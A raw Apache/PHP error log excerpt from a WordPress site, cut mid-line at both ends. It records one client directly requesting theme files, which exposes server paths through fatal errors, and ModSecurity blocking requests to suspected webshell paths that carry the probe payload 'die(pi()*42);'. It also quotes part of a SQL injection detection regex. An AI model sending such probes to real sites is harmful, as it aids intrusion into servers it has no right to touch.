09 16:52:01.439808 2022] [:error] [pid 29371:tid 140372718106368] [client 152.89.196.102:55636] #0 {main} [Tue Aug 09 16:52:01.439907 2022] [:error] [pid 29371:tid 140372718106368] [client 152.89.196.102:55636] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php on line 15 [Tue Aug 09 17:02:14.121531 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:56002] PHP Fatal error: Uncaught Error: Call to undefined function post_password_required() in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php:21 [Tue Aug 09 17:02:14.121610 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:56002] Stack trace: [Tue Aug 09 17:02:14.121637 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:56002] #0 {main} [Tue Aug 09 17:02:14.121750 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:56002] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php on line 21 [Tue Aug 09 17:02:15.375734 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:56004] PHP Fatal error: Uncaught Error: Call to undefined function post_password_required() in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php:21 [Tue Aug 09 17:02:15.375799 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:56004] Stack trace: [Tue Aug 09 17:02:15.375808 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:56004] #0 {main} [Tue Aug 09 17:02:15.375876 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:56004] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php on line 21 [Tue Aug 09 17:02:16.469963 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:56006] PHP Fatal error: Uncaught Error: Call to undefined function post_password_required() in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php:21 [Tue Aug 09 17:02:16.470040 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:56006] Stack trace: [Tue Aug 09 17:02:16.470055 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:56006] #0 {main} [Tue Aug 09 17:02:16.470136 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:56006] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php on line 21 [Tue Aug 09 17:42:19.041776 2022] [:error] [pid 29372:tid 140372625786624] [client 152.89.196.102:57356] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_logo() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php:15 [Tue Aug 09 17:42:19.041849 2022] [:error] [pid 29372:tid 140372625786624] [client 152.89.196.102:57356] Stack trace: [Tue Aug 09 17:42:19.041859 2022] [:error] [pid 29372:tid 140372625786624] [client 152.89.196.102:57356] #0 {main} [Tue Aug 09 17:42:19.041944 2022] [:error] [pid 29372:tid 140372625786624] [client 152.89.196.102:57356] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php on line 15 [Tue Aug 09 17:42:20.262414 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:57358] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_logo() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php:15 [Tue Aug 09 17:42:20.262517 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:57358] Stack trace: [Tue Aug 09 17:42:20.262532 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:57358] #0 {main} [Tue Aug 09 17:42:20.262870 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:57358] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php on line 15 [Tue Aug 09 17:42:21.343887 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:57360] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_logo() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php:15 [Tue Aug 09 17:42:21.343984 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:57360] Stack trace: [Tue Aug 09 17:42:21.344000 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:57360] #0 {main} [Tue Aug 09 17:42:21.344139 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:57360] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php on line 15 [Tue Aug 09 17:43:46.796335 2022] [:error] [pid 29371:tid 140372650964736] [client 152.89.196.102:57390] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php:12 [Tue Aug 09 17:43:46.796430 2022] [:error] [pid 29371:tid 140372650964736] [client 152.89.196.102:57390] Stack trace: [Tue Aug 09 17:43:46.796442 2022] [:error] [pid 29371:tid 140372650964736] [client 152.89.196.102:57390] #0 {main} [Tue Aug 09 17:43:46.796540 2022] [:error] [pid 29371:tid 140372650964736] [client 152.89.196.102:57390] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php on line 12 [Tue Aug 09 17:43:50.261984 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:57392] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php:12 [Tue Aug 09 17:43:50.262071 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:57392] Stack trace: [Tue Aug 09 17:43:50.262086 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:57392] #0 {main} [Tue Aug 09 17:43:50.262235 2022] [:error] [pid 29371:tid 140372642572032] [client 152.89.196.102:57392] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php on line 12 [Tue Aug 09 17:43:52.880160 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:57394] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php:12 [Tue Aug 09 17:43:52.880250 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:57394] Stack trace: [Tue Aug 09 17:43:52.880263 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:57394] #0 {main} [Tue Aug 09 17:43:52.880379 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:57394] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php on line 12 [Tue Aug 09 18:00:37.748654 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:58934] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php:22 [Tue Aug 09 18:00:37.748734 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:58934] Stack trace: [Tue Aug 09 18:00:37.748752 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:58934] #0 {main} [Tue Aug 09 18:00:37.748859 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:58934] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php on line 22 [Tue Aug 09 18:00:38.884209 2022] [:error] [pid 29372:tid 140372592215808] [client 152.89.196.102:58936] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php:22 [Tue Aug 09 18:00:38.884294 2022] [:error] [pid 29372:tid 140372592215808] [client 152.89.196.102:58936] Stack trace: [Tue Aug 09 18:00:38.884305 2022] [:error] [pid 29372:tid 140372592215808] [client 152.89.196.102:58936] #0 {main} [Tue Aug 09 18:00:38.884390 2022] [:error] [pid 29372:tid 140372592215808] [client 152.89.196.102:58936] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php on line 22 [Tue Aug 09 18:00:40.517811 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:58940] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php:22 [Tue Aug 09 18:00:40.517875 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:58940] Stack trace: [Tue Aug 09 18:00:40.517885 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:58940] #0 {main} [Tue Aug 09 18:00:40.517966 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:58940] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php on line 22 [Tue Aug 09 18:02:20.154425 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:59116] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php:17 [Tue Aug 09 18:02:20.154508 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:59116] Stack trace: [Tue Aug 09 18:02:20.154520 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:59116] #0 {main} [Tue Aug 09 18:02:20.154617 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:59116] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php on line 17 [Tue Aug 09 18:02:25.345390 2022] [:error] [pid 29371:tid 140372567037696] [client 152.89.196.102:59126] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php:17 [Tue Aug 09 18:02:25.345481 2022] [:error] [pid 29371:tid 140372567037696] [client 152.89.196.102:59126] Stack trace: [Tue Aug 09 18:02:25.345497 2022] [:error] [pid 29371:tid 140372567037696] [client 152.89.196.102:59126] #0 {main} [Tue Aug 09 18:02:25.345637 2022] [:error] [pid 29371:tid 140372567037696] [client 152.89.196.102:59126] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php on line 17 [Tue Aug 09 18:02:27.700932 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:59128] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php:17 [Tue Aug 09 18:02:27.701002 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:59128] Stack trace: [Tue Aug 09 18:02:27.701012 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:59128] #0 {main} [Tue Aug 09 18:02:27.701096 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:59128] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php on line 17 [Tue Aug 09 18:06:34.974047 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:59384] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/qq.php"] [unique_id "YvLoeofZxeIP9Uc1qosyfAAAAJc"] [Tue Aug 09 18:06:36.560812 2022] [:error] [pid 29372:tid 140372592215808] [client 152.89.196.102:59386] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/qq.php"] [unique_id "YvLofCGeH44ufVD7B05JZwAAAFM"] [Tue Aug 09 18:06:37.824590 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:59388] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/qq.php"] [unique_id "YvLofSGeH44ufVD7B05JaAAAAFY"] [Tue Aug 09 18:39:53.055180 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:60220] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_header_markup() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/header-image.php:15 [Tue Aug 09 18:39:53.055257 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:60220] Stack trace: [Tue Aug 09 18:39:53.055268 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:60220] #0 {main} [Tue Aug 09 18:39:53.055379 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:60220] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/header-image.php on line 15 [Tue Aug 09 18:39:54.922714 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:60222] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_header_markup() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/header-image.php:15 [Tue Aug 09 18:39:54.922796 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:60222] Stack trace: [Tue Aug 09 18:39:54.922806 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:60222] #0 {main} [Tue Aug 09 18:39:54.922891 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:60222] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/header-image.php on line 15 [Tue Aug 09 18:39:56.912740 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60224] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_header_markup() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/header-image.php:15 [Tue Aug 09 18:39:56.912824 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60224] Stack trace: [Tue Aug 09 18:39:56.912837 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60224] #0 {main} [Tue Aug 09 18:39:56.912959 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60224] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/header-image.php on line 15 [Tue Aug 09 19:04:47.048949 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:60840] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php:15 [Tue Aug 09 19:04:47.049018 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:60840] Stack trace: [Tue Aug 09 19:04:47.049031 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:60840] #0 {main} [Tue Aug 09 19:04:47.049132 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:60840] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php on line 15 [Tue Aug 09 19:04:49.066517 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:60842] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php:15 [Tue Aug 09 19:04:49.066601 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:60842] Stack trace: [Tue Aug 09 19:04:49.066616 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:60842] #0 {main} [Tue Aug 09 19:04:49.066763 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:60842] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php on line 15 [Tue Aug 09 19:04:50.927366 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60848] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php:15 [Tue Aug 09 19:04:50.927457 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60848] Stack trace: [Tue Aug 09 19:04:50.927472 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60848] #0 {main} [Tue Aug 09 19:04:50.927590 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:60848] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php on line 15 [Tue Aug 09 19:30:46.905490 2022] [:error] [pid 29371:tid 140372625786624] [client 152.89.196.102:33174] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php:199 [Tue Aug 09 19:30:46.905589 2022] [:error] [pid 29371:tid 140372625786624] [client 152.89.196.102:33174] Stack trace: [Tue Aug 09 19:30:46.905604 2022] [:error] [pid 29371:tid 140372625786624] [client 152.89.196.102:33174] #0 {main} [Tue Aug 09 19:30:46.905694 2022] [:error] [pid 29371:tid 140372625786624] [client 152.89.196.102:33174] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php on line 199 [Tue Aug 09 19:30:49.538522 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:33176] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php:199 [Tue Aug 09 19:30:49.538594 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:33176] Stack trace: [Tue Aug 09 19:30:49.538605 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:33176] #0 {main} [Tue Aug 09 19:30:49.538692 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:33176] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php on line 199 [Tue Aug 09 19:30:51.990462 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:33178] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php:199 [Tue Aug 09 19:30:51.990538 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:33178] Stack trace: [Tue Aug 09 19:30:51.990549 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:33178] #0 {main} [Tue Aug 09 19:30:51.990622 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:33178] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php on line 199 [Tue Aug 09 19:35:41.869887 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:33244] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php:148 [Tue Aug 09 19:35:41.869987 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:33244] Stack trace: [Tue Aug 09 19:35:41.870002 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:33244] #0 {main} [Tue Aug 09 19:35:41.870101 2022] [:error] [pid 29373:tid 140372667750144] [client 152.89.196.102:33244] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php on line 148 [Tue Aug 09 19:35:45.348418 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:33246] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php:148 [Tue Aug 09 19:35:45.348503 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:33246] Stack trace: [Tue Aug 09 19:35:45.348517 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:33246] #0 {main} [Tue Aug 09 19:35:45.348623 2022] [:error] [pid 29373:tid 140372743284480] [client 152.89.196.102:33246] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php on line 148 [Tue Aug 09 19:35:48.645375 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:33248] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php:148 [Tue Aug 09 19:35:48.645467 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:33248] Stack trace: [Tue Aug 09 19:35:48.645483 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:33248] #0 {main} [Tue Aug 09 19:35:48.645588 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:33248] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php on line 148 [Tue Aug 09 19:47:34.930814 2022] [:error] [pid 29371:tid 140372609001216] [client 152.89.196.102:33484] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php:16 [Tue Aug 09 19:47:34.930935 2022] [:error] [pid 29371:tid 140372609001216] [client 152.89.196.102:33484] Stack trace: [Tue Aug 09 19:47:34.930951 2022] [:error] [pid 29371:tid 140372609001216] [client 152.89.196.102:33484] #0 {main} [Tue Aug 09 19:47:34.931044 2022] [:error] [pid 29371:tid 140372609001216] [client 152.89.196.102:33484] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php on line 16 [Tue Aug 09 19:47:37.421847 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:33486] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php:16 [Tue Aug 09 19:47:37.421933 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:33486] Stack trace: [Tue Aug 09 19:47:37.421946 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:33486] #0 {main} [Tue Aug 09 19:47:37.422020 2022] [:error] [pid 29975:tid 140372634179328] [client 152.89.196.102:33486] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php on line 16 [Tue Aug 09 19:47:38.868198 2022] [:error] [pid 29371:tid 140372583823104] [client 152.89.196.102:33490] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php:16 [Tue Aug 09 19:47:38.868286 2022] [:error] [pid 29371:tid 140372583823104] [client 152.89.196.102:33490] Stack trace: [Tue Aug 09 19:47:38.868300 2022] [:error] [pid 29371:tid 140372583823104] [client 152.89.196.102:33490] #0 {main} [Tue Aug 09 19:47:38.868389 2022] [:error] [pid 29371:tid 140372583823104] [client 152.89.196.102:33490] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php on line 16 [Tue Aug 09 20:03:41.040245 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:33722] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/s_e.php"] [unique_id "YvMD7cTVOPfEt2gKe1maKwAAAMY"] [Tue Aug 09 20:03:41.883497 2022] [:error] [pid 29373:tid 140372617393920] [client 152.89.196.102:33724] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/s_e.php"] [unique_id "YvMD7YfZxeIP9Uc1qoszNgAAAJA"] [Tue Aug 09 20:03:43.148062 2022] [:error] [pid 29975:tid 140372583823104] [client 152.89.196.102:33726] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/s_e.php"] [unique_id "YvMD78TVOPfEt2gKe1maLAAAANQ"] [Tue Aug 09 20:38:06.660803 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:34258] PHP Fatal error: Uncaught Error: Call to undefined function get_template_part() in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php:22 [Tue Aug 09 20:38:06.660873 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:34258] Stack trace: [Tue Aug 09 20:38:06.660882 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:34258] #0 {main} [Tue Aug 09 20:38:06.660947 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:34258] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php on line 22 [Tue Aug 09 20:38:11.337905 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:34260] PHP Fatal error: Uncaught Error: Call to undefined function get_template_part() in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php:22 [Tue Aug 09 20:38:11.337990 2022] [:error] [pid 29371:tid 140372592215808] [client 